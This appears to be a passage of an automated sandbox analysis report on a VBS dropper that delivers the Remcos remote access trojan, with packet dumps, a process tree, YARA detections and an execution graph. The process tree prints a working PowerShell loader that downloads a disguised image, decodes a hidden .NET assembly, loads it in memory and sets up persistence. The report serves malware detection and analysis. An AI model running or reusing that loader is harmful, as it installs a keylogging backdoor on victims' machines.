                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 2f 63 2b 5a 41 44 41 41 41 41 77 50 6e 72 49 51 41 41 41 41 41 38 7a 35 74 43 45 41 41 41 41 41 2f 63 4f 30 41 42 41 41 41 41 77 50 6e 54 50 41 41 41 41 41 41 38 44 36 59 41 41 41 41 41 41 41 2f 67 4f 50 41 43 41 41 41 41 77 50 6f 48 47 67 41 41 41 41 41 38 44 36 48 43 41 41 41 41 41 41 2f 67 4f 72 41 44 41 41 41 41 77 50 6f 50 4e 41 41 41 41 41 41 38 44 36 35 44 4d 41 41 41 41 41 2f 6b 65 49 41 41 41 41 41 41 77 50 70 6a 45 77 41 41 41 41 41 38 54 36 78 42 41 41 41 41 41 41 2f 6b 65 6d 41 43 41 41 41 41 77 50 70 4c 4d 77 41 41 41 41 41 38 54 36 73 44 49 41 41 41 41 41 2f 6f 75 46 41 44 41 41 41 41 77 50 71 48 45 77 41 41 41 41 41 38 6a 36 74 42 41 41 41 41 41 41 2f 6f 65 6d 41 41 41 41 41 41 77 50 71 58 4d 67 41 41 41 41 41 38 6a 36 79 44 49 41 41 41 41
                                                                                              Data Ascii: /c+ZADAAAAwPnrIQAAAAA8z5tCEAAAAA/cO0ABAAAAwPnTPAAAAAA8D6YAAAAAAA/gOPACAAAAwPoHGgAAAAA8D6HCAAAAAA/gOrADAAAAwPoPNAAAAAA8D65DMAAAAA/keIAAAAAAwPpjEwAAAAA8T6xBAAAAAA/kemACAAAAwPpLMwAAAAA8T6sDIAAAAA/ouFADAAAAwPqHEwAAAAA8j6tBAAAAAA/oemAAAAAAwPqXMgAAAAA8j6yDIAAAA
                                                                                              2024-12-19 12:20:07 UTC16384INData Raw: 41 67 45 41 44 42 51 52 59 44 4e 41 41 41 51 53 41 67 45 41 61 42 51 52 59 6a 4d 41 41 41 41 53 41 67 45 41 61 42 51 52 59 44 4d 41 41 41 77 51 41 34 45 41 46 42 51 52 59 7a 4b 41 41 41 67 51 41 77 45 41 4f 42 51 52 59 7a 4a 41 41 41 51 51 41 34 45 41 46 42 51 52 59 54 49 41 41 41 51 56 41 34 45 41 46 42 51 52 59 44 47 41 41 41 51 56 41 34 45 41 46 42 51 52 59 7a 44 41 41 41 51 56 41 34 45 41 46 42 51 52 59 6a 43 41 41 41 41 41 41 41 41 41 7a 42 51 5a 41 51 48 41 68 42 41 64 41 4d 48 41 74 41 41 5a 41 55 47 41 30 42 51 61 41 34 47 41 31 42 41 41 41 41 41 41 74 42 77 62 41 51 47 41 6e 42 67 62 41 6b 47 41 72 42 51 4c 41 51 47 41 6c 42 41 64 41 6b 47 41 75 42 51 64 41 41 41 41 76 42 77 5a 41 45 47 41 69 42 77 62 41 51 48 41 67 41 67 4a 41 41 43 41 6b 42 51
                                                                                              Data Ascii: AgEADBQRYDNAAAQSAgEAaBQRYjMAAAASAgEAaBQRYDMAAAwQA4EAFBQRYzKAAAgQAwEAOBQRYzJAAAQQA4EAFBQRYTIAAAQVA4EAFBQRYDGAAAQVA4EAFBQRYzDAAAQVA4EAFBQRYjCAAAAAAAAAzBQZAQHAhBAdAMHAtAAZAUGA0BQaA4GA1BAAAAAAtBwbAQGAnBgbAkGArBQLAQGAlBAdAkGAuBQdAAAAvBwZAEGAiBwbAQHAgAgJAACAkBQ


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:07:19:03
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs"
                                                                                              Imagebase:0x7ff7c11a0000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:07:19:03
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:07:19:03
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:6
                                                                                              Start time:07:19:29
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"
                                                                                              Imagebase:0x7ff67c8e0000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:07:19:29
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:8
                                                                                              Start time:07:19:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:wscript.exe C:\ProgramData\talpe.vbs
                                                                                              Imagebase:0x7ff7c11a0000
                                                                                              File size:170'496 bytes
                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:9
                                                                                              Start time:07:19:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:10
                                                                                              Start time:07:19:30
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:11
                                                                                              Start time:07:19:33
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0x90000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:12
                                                                                              Start time:07:19:33
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0xb30000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                              Has exited:true

                                                                                              Target ID:13
                                                                                              Start time:07:19:55
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"
                                                                                              Imagebase:0xaa0000
                                                                                              File size:147'456 bytes
                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:14
                                                                                              Start time:07:20:07
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0x1c0000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              Target ID:15
                                                                                              Start time:07:20:07
                                                                                              Start date:19/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              Imagebase:0xab0000
                                                                                              File size:262'432 bytes
                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:6%
                                                                                                Total number of Nodes:1791
                                                                                                Total number of Limit Nodes:72
                                                                                                execution_graph 45593 41d4d0 45595 41d4e6 _Yarn ___scrt_fastfail 45593->45595 45594 41d6e3 45599 41d734 45594->45599 45609 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 45594->45609 45595->45594 45597 431f99 21 API calls 45595->45597 45601 41d696 ___scrt_fastfail 45597->45601 45598 41d6f4 45598->45599 45600 41d760 45598->45600 45610 431f99 45598->45610 45600->45599 45618 41d474 21 API calls ___scrt_fastfail 45600->45618 45601->45599 45603 431f99 21 API calls 45601->45603 45607 41d6be ___scrt_fastfail 45603->45607 45605 41d72d ___scrt_fastfail 45605->45599 45615 43264f 45605->45615 45607->45599 45608 431f99 21 API calls 45607->45608 45608->45594 45609->45598 45611 431fa3 45610->45611 45612 431fa7 45610->45612 45611->45605 45619 43a88c 45612->45619 45628 43256f 45615->45628 45617 432657 45617->45600 45618->45599 45624 446aff _strftime 45619->45624 45620 446b3d 45627 445354 20 API calls __dosmaperr 45620->45627 45622 446b28 RtlAllocateHeap 45623 431fac 45622->45623 45622->45624 45623->45605 45624->45620 45624->45622 45626 442200 7 API calls 2 library calls 45624->45626 45626->45624 45627->45623 45629 432588 45628->45629 45633 43257e 45628->45633 45630 431f99 21 API calls 45629->45630 45629->45633 45631 4325a9 45630->45631 45631->45633 45634 43293a CryptAcquireContextA 45631->45634 45633->45617 45635 43295b CryptGenRandom 45634->45635 45636 432956 45634->45636 45635->45636 45637 432970 CryptReleaseContext 45635->45637 45636->45633 45637->45636 45638 426030 45643 4260f7 recv 45638->45643 45644 44e8b6 45645 44e8c1 45644->45645 45646 44e8e9 45645->45646 45647 44e8da 45645->45647 45648 44e8f8 45646->45648 45666 455573 27 API calls 2 library calls 45646->45666 45665 445354 20 API calls __dosmaperr 45647->45665 45653 44b9be 45648->45653 45651 44e8df ___scrt_fastfail 45654 44b9d6 45653->45654 45655 44b9cb 45653->45655 45656 44b9de 45654->45656 45663 44b9e7 _strftime 45654->45663 45667 446aff 45655->45667 45674 446ac5 45656->45674 45659 44ba11 RtlReAllocateHeap 45661 44b9d3 45659->45661 45659->45663 45660 44b9ec 45680 445354 20 API calls __dosmaperr 45660->45680 45661->45651 45663->45659 45663->45660 45681 442200 7 API calls 2 library calls 45663->45681 45665->45651 45666->45648 45668 446b3d 45667->45668 45673 446b0d _strftime 45667->45673 45683 445354 20 API calls __dosmaperr 45668->45683 45670 446b28 RtlAllocateHeap 45671 446b3b 45670->45671 45670->45673 45671->45661 45673->45668 45673->45670 45682 442200 7 API calls 2 library calls 45673->45682 45675 446ad0 RtlFreeHeap 45674->45675 45676 446af9 _free 45674->45676 45675->45676 45677 446ae5 45675->45677 45676->45661 45684 445354 20 API calls __dosmaperr 45677->45684 45679 446aeb GetLastError 45679->45676 45680->45661 45681->45663 45682->45673 45683->45671 45684->45679 45685 426091 45690 42610e send 45685->45690 45691 425e56 45692 425e6b 45691->45692 45695 425f0b 45691->45695 45693 425f25 45692->45693 45694 425f5a 45692->45694 45692->45695 45696 425eb9 45692->45696 45697 425f77 45692->45697 45698 425f9e 45692->45698 45703 425eee 45692->45703 45719 424354 50 API calls _Yarn 45692->45719 45693->45694 45693->45695 45722 41f075 54 API calls 45693->45722 45694->45697 45723 424b7b 21 API calls 45694->45723 45696->45695 45696->45703 45720 41f075 54 API calls 45696->45720 45697->45695 45697->45698 45707 424f78 45697->45707 45698->45695 45724 4255c7 28 API calls 45698->45724 45703->45693 45703->45695 45721 424354 50 API calls _Yarn 45703->45721 45708 424f97 ___scrt_fastfail 45707->45708 45711 424fa6 45708->45711 45716 424fcb 45708->45716 45725 41e097 21 API calls 45708->45725 45709 424fab 45714 424fb4 45709->45714 45709->45716 45727 41cf6e 50 API calls 45709->45727 45711->45709 45711->45716 45726 41fad4 47 API calls 45711->45726 45714->45716 45728 424185 21 API calls 2 library calls 45714->45728 45716->45698 45717 42504e 45717->45716 45718 431f99 21 API calls 45717->45718 45718->45709 45719->45696 45720->45696 45721->45693 45722->45693 45723->45697 45724->45695 45725->45711 45726->45717 45727->45714 45728->45716 45729 415279 45775 401d64 45729->45775 45731 415284 45780 43a5e7 45731->45780 45734 401d64 28 API calls 45735 41529f 45734->45735 45784 401fbd 45735->45784 45737 4152a9 45738 401d64 28 API calls 45737->45738 45739 4152c4 45738->45739 45740 401fbd 28 API calls 45739->45740 45741 4152cf 45740->45741 45742 401fbd 28 API calls 45741->45742 45743 4152de 45742->45743 45744 4152e2 45743->45744 45745 41532b 45743->45745 45833 4178b9 45744->45833 45746 4178b9 193 API calls 45745->45746 45748 415337 45746->45748 45750 401d64 28 API calls 45748->45750 45752 415342 45750->45752 45751 401d64 28 API calls 45753 4152f9 45751->45753 45754 43a5e7 42 API calls 45752->45754 45755 43a5e7 42 API calls 45753->45755 45756 41534f 45754->45756 45757 415306 45755->45757 45758 401d64 28 API calls 45756->45758 45759 401d64 28 API calls 45757->45759 45760 415360 45758->45760 45761 415317 45759->45761 45762 43a5e7 42 API calls 45760->45762 45763 43a5e7 42 API calls 45761->45763 45764 415324 45762->45764 45763->45764 45788 417a88 45764->45788 45767 4161f2 45899 401d8c 45767->45899 45770 4161fb 45771 401eea 26 API calls 45770->45771 45772 416207 45771->45772 45773 401eea 26 API calls 45772->45773 45774 416213 45773->45774 45776 401d6c 45775->45776 45777 401d74 45776->45777 45905 401fff 28 API calls 45776->45905 45777->45731 45781 43a600 _swprintf 45780->45781 45906 43993e 45781->45906 45785 401fcc 45784->45785 45940 402501 45785->45940 45787 401fea 45787->45737 45945 401f66 45788->45945 45792 417abd 45793 417acc 45792->45793 45795 417aeb 45792->45795 45794 401fbd 28 API calls 45793->45794 45796 417add 45794->45796 45798 417b29 45795->45798 45799 417af8 45795->45799 45797 404468 60 API calls 45796->45797 45801 417ae6 45797->45801 45990 417bdc 45798->45990 46027 417d96 63 API calls 45799->46027 45806 401eea 26 API calls 45801->45806 45804 417b16 46028 401eef 45804->46028 45805 401eef 26 API calls 45809 417b42 45805->45809 45810 417bcb 45806->45810 45808 417b1f 45812 401eea 26 API calls 45808->45812 45813 401eea 26 API calls 45809->45813 45811 401eea 26 API calls 45810->45811 45814 41538f 45811->45814 45815 417b27 45812->45815 45813->45815 45814->45767 45895 401eea 45814->45895 46002 41af9e 45815->46002 45819 417b7f 46009 4027cb 45819->46009 45821 417b8a 45822 4027cb 28 API calls 45821->45822 45823 417b94 45822->45823 46012 404468 45823->46012 45826 401eea 26 API calls 45827 417ba8 45826->45827 45828 401eea 26 API calls 45827->45828 45829 417bb0 45828->45829 45830 401eea 26 API calls 45829->45830 45831 417bbb 45830->45831 45832 401eea 26 API calls 45831->45832 45832->45801 46096 401ebd 45833->46096 45836 401ebd 28 API calls 45837 4178ea 45836->45837 45838 41790f ___scrt_fastfail 45837->45838 45839 417900 GdiplusStartup 45837->45839 46100 4185f1 45838->46100 45839->45838 45843 417942 46110 401e13 45843->46110 45845 41794b 45846 417951 45845->45846 45847 417958 45845->45847 46183 4047eb 98 API calls 45846->46183 46114 417f71 DeleteDC 45847->46114 45850 41795d 46115 4041f1 45850->46115 45852 417964 45853 417a5d 45852->45853 46122 40428c connect 45852->46122 46201 4047eb 98 API calls 45853->46201 45857 401eea 26 API calls 45859 417a70 45857->45859 45858 41797c 46182 4045aa CreateThread 45858->46182 45861 401eea 26 API calls 45859->45861 45863 4152ee 45861->45863 45862 417988 45864 417a29 45862->45864 45865 4179a8 45862->45865 45863->45751 45867 4027ec 28 API calls 45864->45867 46184 41ae68 28 API calls 45865->46184 45869 417a3c 45867->45869 45868 4179b2 46185 41ad46 45868->46185 45871 4027cb 28 API calls 45869->45871 45873 417a46 45871->45873 45875 404468 60 API calls 45873->45875 45877 417a27 45875->45877 45876 4179d5 46194 40275c 45876->46194 45879 401eea 26 API calls 45877->45879 45881 417a5b 45879->45881 45880 4179e1 45882 4027cb 28 API calls 45880->45882 45881->45857 45883 4179ed 45882->45883 45884 40275c 28 API calls 45883->45884 45885 4179f7 45884->45885 45886 404468 60 API calls 45885->45886 45887 417a01 45886->45887 45888 401eea 26 API calls 45887->45888 45889 417a0c 45888->45889 45890 401eea 26 API calls 45889->45890 45891 417a15 45890->45891 45892 401eea 26 API calls 45891->45892 45893 417a1e 45892->45893 45894 401eea 26 API calls 45893->45894 45894->45877 45896 4021b9 45895->45896 45897 4021e8 45896->45897 46518 40262e 45896->46518 45897->45767 45900 40200a 45899->45900 45904 40203a 45900->45904 46526 402654 26 API calls 45900->46526 45902 40202b 46527 4026ba 26 API calls _Deallocate 45902->46527 45904->45770 45924 43a545 45906->45924 45908 43998b 45933 4392de 38 API calls 2 library calls 45908->45933 45910 439950 45910->45908 45911 439965 45910->45911 45923 415291 45910->45923 45931 445354 20 API calls __dosmaperr 45911->45931 45912 439997 45917 4399c6 45912->45917 45934 43a58a 42 API calls __Tolower 45912->45934 45914 43996a 45932 43a827 26 API calls _Deallocate 45914->45932 45920 439a32 45917->45920 45935 43a4f1 26 API calls 2 library calls 45917->45935 45936 43a4f1 26 API calls 2 library calls 45920->45936 45921 439af9 _swprintf 45921->45923 45937 445354 20 API calls __dosmaperr 45921->45937 45923->45734 45925 43a54a 45924->45925 45926 43a55d 45924->45926 45938 445354 20 API calls __dosmaperr 45925->45938 45926->45910 45928 43a54f 45939 43a827 26 API calls _Deallocate 45928->45939 45930 43a55a 45930->45910 45931->45914 45932->45923 45933->45912 45934->45912 45935->45920 45936->45921 45937->45923 45938->45928 45939->45930 45941 40250d 45940->45941 45943 40252b 45941->45943 45944 40261a 28 API calls 45941->45944 45943->45787 45944->45943 45946 401f6e 45945->45946 46032 402301 45946->46032 45949 417f9f CreateDCA CreateCompatibleDC 46041 418452 45949->46041 45951 4183a7 45952 401f66 28 API calls 45951->45952 45989 41838c 45952->45989 45953 417fd8 45953->45951 45954 41803f CreateCompatibleBitmap 45953->45954 45955 418053 DeleteDC DeleteDC 45954->45955 45956 418069 SelectObject 45954->45956 45957 4183a1 DeleteObject 45955->45957 45958 418079 StretchBlt 45956->45958 45959 41838e DeleteDC DeleteDC 45956->45959 45957->45951 45958->45959 45960 4180a1 45958->45960 45959->45957 45961 418122 45960->45961 45966 4180bf GetIconInfo 45960->45966 45962 418166 GetObjectA 45961->45962 45963 418135 BitBlt 45961->45963 45964 418156 45961->45964 45962->45959 45969 418181 45962->45969 45963->45962 45964->45962 45965 418195 45967 4181cc LocalAlloc 45965->45967 45966->45961 45968 4180d5 DeleteObject DeleteObject DrawIcon 45966->45968 45970 4181ec GlobalAlloc 45967->45970 45968->45961 45969->45965 45969->45967 45971 4181b1 45969->45971 45970->45959 45974 41825a GetDIBits 45970->45974 45971->45965 45973 4181b6 LocalAlloc 45971->45973 45973->45970 45975 418275 DeleteDC DeleteDC DeleteObject GlobalFree 45974->45975 45976 41829b 45974->45976 45975->45951 45977 402325 28 API calls 45976->45977 45978 4182f3 45977->45978 45979 402325 28 API calls 45978->45979 45980 418310 45979->45980 45981 402325 28 API calls 45980->45981 45982 418332 45981->45982 45983 418343 DeleteObject GlobalFree DeleteDC 45982->45983 45984 418365 DeleteDC 45983->45984 45985 418368 45983->45985 45984->45985 45986 401eea 26 API calls 45985->45986 45987 418383 45986->45987 45988 401eea 26 API calls 45987->45988 45988->45989 45989->45792 45991 417bff 45990->45991 46046 4177a2 GdipLoadImageFromStream 45991->46046 45993 417c1b 46047 4183c0 45993->46047 45995 417c29 46054 417815 GdipSaveImageToStream 45995->46054 45997 417c71 46056 404be8 45997->46056 45999 417c8a 46060 4177c5 GdipDisposeImage 45999->46060 46001 417b38 46001->45805 46003 41afa9 46002->46003 46004 417b73 46003->46004 46005 401f66 28 API calls 46003->46005 46006 405cc5 46004->46006 46005->46004 46068 402ee5 46006->46068 46008 405cd3 46008->45819 46085 401e9b 46009->46085 46011 4027d9 46011->45821 46013 40447b 46012->46013 46014 404be8 28 API calls 46013->46014 46015 404490 _Yarn 46014->46015 46016 404507 WaitForSingleObject 46015->46016 46017 4044e7 46015->46017 46019 40451d 46016->46019 46018 4044f9 send 46017->46018 46020 404542 46018->46020 46094 42051a 56 API calls 46019->46094 46023 401eea 26 API calls 46020->46023 46022 404530 SetEvent 46022->46020 46024 40454a 46023->46024 46025 401eea 26 API calls 46024->46025 46026 404552 46025->46026 46026->45826 46027->45804 46029 401efe 46028->46029 46031 401f0a 46029->46031 46095 4021b9 26 API calls 46029->46095 46031->45808 46033 40230d 46032->46033 46036 402325 46033->46036 46035 401f80 46035->45949 46037 40232f 46036->46037 46039 40233a 46037->46039 46040 40294a 28 API calls 46037->46040 46039->46035 46040->46039 46044 436050 46041->46044 46045 418470 EnumDisplaySettingsW 46044->46045 46045->45953 46046->45993 46061 41785e GdipGetImageEncodersSize 46047->46061 46049 4183e3 46050 418408 46049->46050 46051 43a88c ___crtLCMapStringA 21 API calls 46049->46051 46050->45995 46052 4183f2 46051->46052 46052->46050 46062 417867 GdipGetImageEncoders 46052->46062 46055 417835 46054->46055 46055->45997 46057 404bf0 46056->46057 46063 404c0c 46057->46063 46059 404c06 46059->45999 46060->46001 46061->46049 46062->46050 46064 404c16 46063->46064 46066 404c21 46064->46066 46067 404d07 28 API calls 46064->46067 46066->46059 46067->46066 46069 402ef1 46068->46069 46072 4031b4 46069->46072 46071 402f04 46071->46008 46073 4031c5 46072->46073 46078 4032a4 46073->46078 46077 4031e5 46077->46071 46079 4032b0 46078->46079 46080 4031d1 46078->46080 46084 4032b6 28 API calls 46079->46084 46080->46077 46083 40379b 28 API calls 46080->46083 46083->46077 46086 401ea7 46085->46086 46089 40245c 46086->46089 46088 401eb9 46088->46011 46090 402469 46089->46090 46092 402478 46090->46092 46093 402ad3 28 API calls 46090->46093 46092->46088 46093->46092 46094->46022 46095->46031 46097 401ec9 46096->46097 46098 401ee4 46097->46098 46099 402325 28 API calls 46097->46099 46098->45836 46099->46098 46101 418608 46100->46101 46102 417937 46101->46102 46105 401e13 26 API calls 46101->46105 46202 403b40 46101->46202 46206 4028cf 46101->46206 46106 401e18 46102->46106 46105->46101 46107 401e27 46106->46107 46109 401e33 46107->46109 46227 402121 26 API calls 46107->46227 